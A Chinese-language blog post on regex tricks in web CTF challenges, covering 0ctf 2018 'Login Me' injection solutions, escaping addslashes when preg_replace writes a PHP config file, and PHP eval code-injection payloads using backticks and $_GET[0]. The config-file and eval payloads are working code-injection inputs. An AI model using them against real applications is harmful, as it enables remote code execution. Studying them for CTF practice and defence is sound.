<!DOCTYPE html>





<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.4.0">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.4.0">
  <link rel="mask-icon" href="/images/logo.svg?v=7.4.0" color="#222">

<link rel="stylesheet" href="/css/main.css?v=7.4.0">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.7.0">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '7.4.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":false,"show_result":false,"style":null},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: '',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    translation: {
      copy_button: 'Copy',
      copy_success: 'Copied',
      copy_failure: 'Copy failed'
    },
    sidebarPadding: 40
  };
</script>

  <meta name="description" content="tips ^xxx$ xxx\n 也满足左面的正则表达式 正则表达式断言（更精确的匹配) https://regex101.com/ 正则表达式分析工具0ctf 2018 login me  正则表达式的注入到这里思考一个问题，由于每次替换的内容都会出现两个双引号，双引号逃逸成为了最关键的问题#name#增加两个单引号&amp;quot;haha&amp;quot;一个变俩&amp;quot;haha&amp;quot;+&amp;qu">
<meta name="keywords" content="php,ctf,re">
<meta property="og:type" content="article">
<meta property="og:title" content="正则表达式中的奇技淫巧">
<meta property="og:url" content="http://yoursite.com/2019/09/09/php-re-tricks/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="tips ^xxx$ xxx\n 也满足左面的正则表达式 正则表达式断言（更精确的匹配) https://regex101.com/ 正则表达式分析工具0ctf 2018 login me  正则表达式的注入到这里思考一个问题，由于每次替换的内容都会出现两个双引号，双引号逃逸成为了最关键的问题#name#增加两个单引号&amp;quot;haha&amp;quot;一个变俩&amp;quot;haha&amp;quot;+&amp;qu">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-10-06T03:38:19.301Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="正则表达式中的奇技淫巧">
<meta name="twitter:description" content="tips ^xxx$ xxx\n 也满足左面的正则表达式 正则表达式断言（更精确的匹配) https://regex101.com/ 正则表达式分析工具0ctf 2018 login me  正则表达式的注入到这里思考一个问题，由于每次替换的内容都会出现两个双引号，双引号逃逸成为了最关键的问题#name#增加两个单引号&amp;quot;haha&amp;quot;一个变俩&amp;quot;haha&amp;quot;+&amp;qu">
  <link rel="canonical" href="http://yoursite.com/2019/09/09/php-re-tricks/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>正则表达式中的奇技淫巧 | Hexo</title>
  








  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
  <div class="container use-motion">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Hexo</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
      
      
      
        
        <li class="menu-item menu-item-home">
      
    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>Home</a>

  </li>
      
      
      
        
        <li class="menu-item menu-item-archives">
      
    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>Archives</a>

  </li>
  </ul>

    

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
      <article itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block post">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/09/09/php-re-tricks/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="wuyx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">正则表达式中的奇技淫巧

          
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              
                
              

              <time title="Created: 2019-09-09 22:28:32" itemprop="dateCreated datePublished" datetime="2019-09-09T22:28:32+08:00">2019-09-09</time>
            </span>
          
            

            
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2019-10-06 11:38:19" itemprop="dateModified" datetime="2019-10-06T11:38:19+08:00">2019-10-06</time>
              </span>
            
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/websecurity/" itemprop="url" rel="index"><span itemprop="name">websecurity</span></a></span>

                
                
              
            </span>
          

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="tips"><a href="#tips" class="headerlink" title="tips"></a>tips</h2><ul>
<li><code>^xxx$</code> <code>xxx\n</code> 也满足左面的正则表达式</li>
<li>正则表达式断言（更精确的匹配)</li>
<li><a href="https://regex101.com/" target="_blank" rel="noopener">https://regex101.com/</a> 正则表达式分析工具<h2 id="0ctf-2018-login-me"><a href="#0ctf-2018-login-me" class="headerlink" title="0ctf 2018 login me"></a>0ctf 2018 login me</h2></li>
</ul>
<p><strong>正则表达式的注入</strong><br>到这里思考一个问题，由于每次替换的内容都会出现两个双引号，双引号逃逸成为了最关键的问题<br><code>#name#</code><br>增加两个单引号<br><code>&quot;haha&quot;</code><br>一个变俩<br><code>&quot;haha&quot;+&quot;</code><br>一个变俩<br><code>&quot;haha&quot;+&quot;&quot;</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == #username# &amp;&amp; #username# == &quot;admin&quot; &amp;&amp; hex_md5(#password#) == this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; hex_md5(#password#) == this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot; == this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot; &quot;&lt;=&quot; this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&lt;=&quot; this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&quot;&lt;=&quot; this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>目前到这里，左边没有什么问题，但是<code>&lt;=</code>右边出现了问题。因为<code>&quot; this</code> 之间无法通过<code>+</code>进行连接，所以应该最右边的双引号后面最好跟的是<code>;</code></p>
<p>另外一个是<code>password_column</code>的值我们不知道是随机的，这部分我们不能替换？熟悉nodejs的可以替换</p>
<h3 id="解法一"><a href="#解法一" class="headerlink" title="解法一"></a>解法一</h3><p><a href="https://coxxs.me/676" target="_blank" rel="noopener">https://coxxs.me/676</a></p>
<p><code>this.password_column</code>可以用<code>this[&quot;password_column&quot;]</code>代替，所以就可以这样替换</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot; == this.password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>== this.</code> 换成<code>&lt;= this[</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot; &quot;&lt;= this[&quot;password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>&quot; &quot;</code> 换成<code>&quot;+&quot;</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&lt;= this[&quot;password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>&quot;</code> 换成<code>&quot;&quot;</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&quot;&lt;= this[&quot;password_column)&#123;return 1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>){return</code> 换成<code>]){return</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&quot;&lt;= this[&quot;password_column&quot;])&#123;return &quot;1;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>&quot;1</code>换成<code>&quot;1&quot;</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&quot;&lt;= this[&quot;password_column&quot;])&#123;return &quot;1&quot;;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>&quot;</code> 换成<code>&quot;+a+&quot;</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&quot;&lt;= this[&quot;password_column&quot;])&#123;return &quot;1&quot;+a+&quot;;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>将<code>&quot;</code>换成<code>&quot;&quot;</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if(this.username == &quot;admin&quot; &amp;&amp; &quot;admin&quot; == &quot;admin&quot; &amp;&amp; &quot;evil&quot;+&quot;&quot;&lt;= this[&quot;password_column&quot;])&#123;return &quot;1&quot;+a+&quot;&quot;;&#125;else&#123;return 0;&#125;</span><br></pre></td></tr></table></figure>

<p>对于<code>&quot;</code>的替换可以用正则表达式中的断言</p>
<p><code>&quot;(?=;}else)</code>这种方式</p>
<h3 id="解法二"><a href="#解法二" class="headerlink" title="解法二"></a>解法二</h3><p><a href="https://github.com/l4wio/CTF-challenges-by-me/tree/master/0ctf_quals-2018/LoginMe" target="_blank" rel="noopener">https://github.com/l4wio/CTF-challenges-by-me/tree/master/0ctf_quals-2018/LoginMe</a></p>
<p>不允许出现<code>()</code>就不能调用函数了吗？</p>
<p>js可以通过下面的方式调用函数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos;xxx&apos;.charCodeAt`0`</span><br></pre></td></tr></table></figure>

<p>调用函数的问题已经解决，再来看<code>&quot;</code>闭合的问题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">var test = &apos;xxxx&quot;xx&apos;</span><br><span class="line">test = test.replace(new RegExp(&apos;(x*(&quot;).*)&apos;),JSON.stringify(&quot;$2; alert(1);$2&quot;))</span><br></pre></td></tr></table></figure>

<p>上面执行的结果是</p>
<p><code>&quot;&quot;; alert(1);&quot;&quot;</code></p>
<p>所以<code>stringify</code>两端的<code>&quot;</code>可以在replace的时候通过<code>$2</code>补齐。</p>
<p><code>$2</code>表示用第二个group替换，也就是上面的<code>&quot;</code></p>
<p>双引号的问题解决</p>
<p>那个特殊的列应该怎么搞law太强了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">this[Object.keys.call`$&#123;this&#125;`[3]]</span><br></pre></td></tr></table></figure>

<h3 id="解法三"><a href="#解法三" class="headerlink" title="解法三"></a>解法三</h3><p><a href="https://delcoding.github.io/2018/04/0ctf-writeup2/" target="_blank" rel="noopener">https://delcoding.github.io/2018/04/0ctf-writeup2/</a></p>
<p>用了eval和sleep来搞事，但是他的payload有括号，<del>我感觉应该行不通</del>，因为有这个的检查<code>var valid = [&#39;#&#39;,&#39;(&#39;,&#39;)&#39;].every((x)=&gt;{return req.body[k].indexOf(x) == -1});</code>。</p>
<p>并不是简单的传参数，而是使用了数组的方式</p>
<p><code>username[]=eval(</code> 这样好像能绕过检查</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">JSON.stringify(&quot;xxxx&quot;)</span><br><span class="line">&quot;&quot;xxxx&quot;&quot;</span><br><span class="line">JSON.stringify([&quot;xxxx&quot;])</span><br><span class="line">&quot;[&quot;xxxx&quot;]&quot;</span><br></pre></td></tr></table></figure>

<h3 id="解法四"><a href="#解法四" class="headerlink" title="解法四"></a>解法四</h3><p><a href="https://hyunmini.tistory.com/124" target="_blank" rel="noopener">https://hyunmini.tistory.com/124</a></p>
<p>结合了解法三和解法二</p>
<h2 id="写配置文件"><a href="#写配置文件" class="headerlink" title="写配置文件"></a>写配置文件</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'option'</span>])) <span class="keyword">die</span>();</span><br><span class="line">$str = addslashes($_GET[<span class="string">'option'</span>]);</span><br><span class="line">$file = file_get_contents(<span class="string">'./config.php'</span>);</span><br><span class="line">$file = preg_replace(<span class="string">'|\$option=\'.*\';|'</span>, <span class="string">"\$option='$str';"</span>, $file);</span><br><span class="line">file_put_contents(<span class="string">'./config.php'</span>, $file);</span><br></pre></td></tr></table></figure>

<p>看似没有任何问题，由于加了<code>addslashes</code>，逃不掉单引号的束缚。</p>
<p>假设原来<code>config.php</code> 的内内容为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$option=<span class="string">'config'</span>;</span><br></pre></td></tr></table></figure>

<h3 id="解法一-1"><a href="#解法一-1" class="headerlink" title="解法一"></a>解法一</h3><p>利用换行和注释符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">option=xxxx&apos;;\nphpinfo();//</span><br></pre></td></tr></table></figure>

<p><code>addslashesh</code>处理后</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">option=xxxx\&apos;;\nphpinfo();//</span><br></pre></td></tr></table></figure>

<p>写到配置文件里</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$option=&apos;config\&apos;;</span><br><span class="line">phpinfo();//&apos;</span><br></pre></td></tr></table></figure>

<p>还得再来一步</p>
<p><code>option=a</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$option=&apos;a&apos;;</span><br><span class="line">phpinfo();//&apos;</span><br></pre></td></tr></table></figure>

<h3 id="解法二-1"><a href="#解法二-1" class="headerlink" title="解法二"></a>解法二</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $s = preg_replace(<span class="string">"/'/"</span>, <span class="string">"\'"</span>, <span class="string">"\'xxxx"</span>);</span><br><span class="line">php &gt; print_r($s);</span><br><span class="line">\\<span class="string">'xxxx</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $s = preg_replace(<span class="string">"/'/"</span>, <span class="string">"\'"</span>, <span class="string">"'xxxx"</span>);</span><br><span class="line">php &gt; print_r($s);</span><br><span class="line">\<span class="string">'xxxx</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php &gt; $s = preg_replace(<span class="string">"/'/"</span>, <span class="string">"\\'"</span>, <span class="string">"'xxxx"</span>);</span><br><span class="line">php &gt; print_r($s);</span><br><span class="line">\<span class="string">'xxxx</span></span><br></pre></td></tr></table></figure>

<p>在正则表达是中，有些保留字符如<code>[](){}\</code> 等，如果需要匹配字符串中的<code>(</code> 则需要对进行转义，</p>
<p>从上面可以看到<code>&quot;\&#39;&quot;</code> 和<code>&quot;\\&#39;&quot;</code>的效果是一样的。</p>
<p>原因是因为<code>&#39;</code>不是保留字符，所以前面加的<code>\</code>不是转义字符</p>
<p>两者在内存中的状态都是<code>\&#39;</code></p>
<p>当我们</p>
<p><code>option=xxxx\&#39;;phpinfo();//</code>的时候</p>
<p>addslash之后变成了</p>
<p><code>xxxx\\\&#39;;phpinfo();//</code></p>
<p>到了preg_replace()那里，<code>xxxx\\\&#39;;phpinfo();//</code> 相当于<code>xxxx\\&#39;;phpinfo();//</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$option=<span class="string">'xxxx\\'</span>;phpinfo();<span class="comment">//'</span></span><br></pre></td></tr></table></figure>

<h3 id="解法三-1"><a href="#解法三-1" class="headerlink" title="解法三"></a>解法三</h3><p>即使利用上面的<code>$n</code>，由于不能控制正则表达式的那项，没有括号，所以只有<code>$0</code>也就是本身</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$option=&apos;;phpinfo();&apos;;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$option=&apos;$option=&apos;;phpinfo();&apos;;&apos;;</span><br></pre></td></tr></table></figure>

<p>强强强。</p>
<p>参考这个老哥的文章</p>
<p><a href="http://wonderkun.cc/index.html/?p=557" target="_blank" rel="noopener">http://wonderkun.cc/index.html/?p=557</a></p>
<h2 id="code-injection"><a href="#code-injection" class="headerlink" title="code injection"></a>code injection</h2><p><a href="https://blog.ripstech.com/2018/moodle-remote-code-execution/" target="_blank" rel="noopener">https://blog.ripstech.com/2018/moodle-remote-code-execution/</a></p>
<p>eval的payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval(&apos;$str= /*&#123;a*/`$_GET[0]`;//1.2&#125;;&apos;)</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval(&apos;$str = 1?&gt;&lt;?=log(1)&#123;a.`$_GET[0]`.(&#123;x&#125;)&#125;?&gt;;&apos;)</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">eval(&apos; $str = /*&#123;x&#125;&#123;a*/`$_GET[0]`/*(1)//&#125;&#123;a*/`$_GET[0]`/*(&#123;x&#125;)//&#125;*/;&apos;)</span><br></pre></td></tr></table></figure>

<h3 id="PHP利用PCRE回溯次数绕过某些安全限制"><a href="#PHP利用PCRE回溯次数绕过某些安全限制" class="headerlink" title="PHP利用PCRE回溯次数绕过某些安全限制"></a>PHP利用PCRE回溯次数绕过某些安全限制</h3><p><a href="https://xz.aliyun.com/t/3432" target="_blank" rel="noopener">https://xz.aliyun.com/t/3432</a></p>
<h2 id="后续接着补充"><a href="#后续接着补充" class="headerlink" title="后续接着补充"></a>后续接着补充</h2>
    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/php/" rel="tag"># php</a>
            
              <a href="/tags/ctf/" rel="tag"># ctf</a>
            
              <a href="/tags/re/" rel="tag"># re</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
                <a href="/2019/09/09/Hello-Hexo/" rel="next" title="Hello Hexo">
                  <i class="fa fa-chevron-left"></i> Hello Hexo
                </a>
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/10/06/ezdotso-writeup-by-race-condition/" rel="prev" title="ezdotso通过php临时文件竞争解法">
                  ezdotso通过php临时文件竞争解法 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#tips"><span class="nav-number">1.</span> <span class="nav-text">tips</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0ctf-2018-login-me"><span class="nav-number">2.</span> <span class="nav-text">0ctf 2018 login me</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#解法一"><span class="nav-number">2.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解法二"><span class="nav-number">2.2.</span> <span class="nav-text">解法二</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解法三"><span class="nav-number">2.3.</span> <span class="nav-text">解法三</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解法四"><span class="nav-number">2.4.</span> <span class="nav-text">解法四</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#写配置文件"><span class="nav-number">3.</span> <span class="nav-text">写配置文件</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#解法一-1"><span class="nav-number">3.1.</span> <span class="nav-text">解法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解法二-1"><span class="nav-number">3.2.</span> <span class="nav-text">解法二</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#解法三-1"><span class="nav-number">3.3.</span> <span class="nav-text">解法三</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#code-injection"><span class="nav-number">4.</span> <span class="nav-text">code injection</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#PHP利用PCRE回溯次数绕过某些安全限制"><span class="nav-number">4.1.</span> <span class="nav-text">PHP利用PCRE回溯次数绕过某些安全限制</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后续接着补充"><span class="nav-number">5.</span> <span class="nav-text">后续接着补充</span></a></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">wuyx</p>
  <div class="site-description" itemprop="description"></div>
</div>
  <nav class="site-state motion-element">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">categories</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">tags</span>
        </a>
      </div>
    
  </nav>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wuyx</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.4.0</div>

        












        
      </div>
    </footer>
  </div>

  


  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.0"></script><script src="/js/motion.js?v=7.4.0"></script>
<script src="/js/schemes/muse.js?v=7.4.0"></script>
<script src="/js/next-boot.js?v=7.4.0"></script>



  





















  

  

  

</body>
</html>
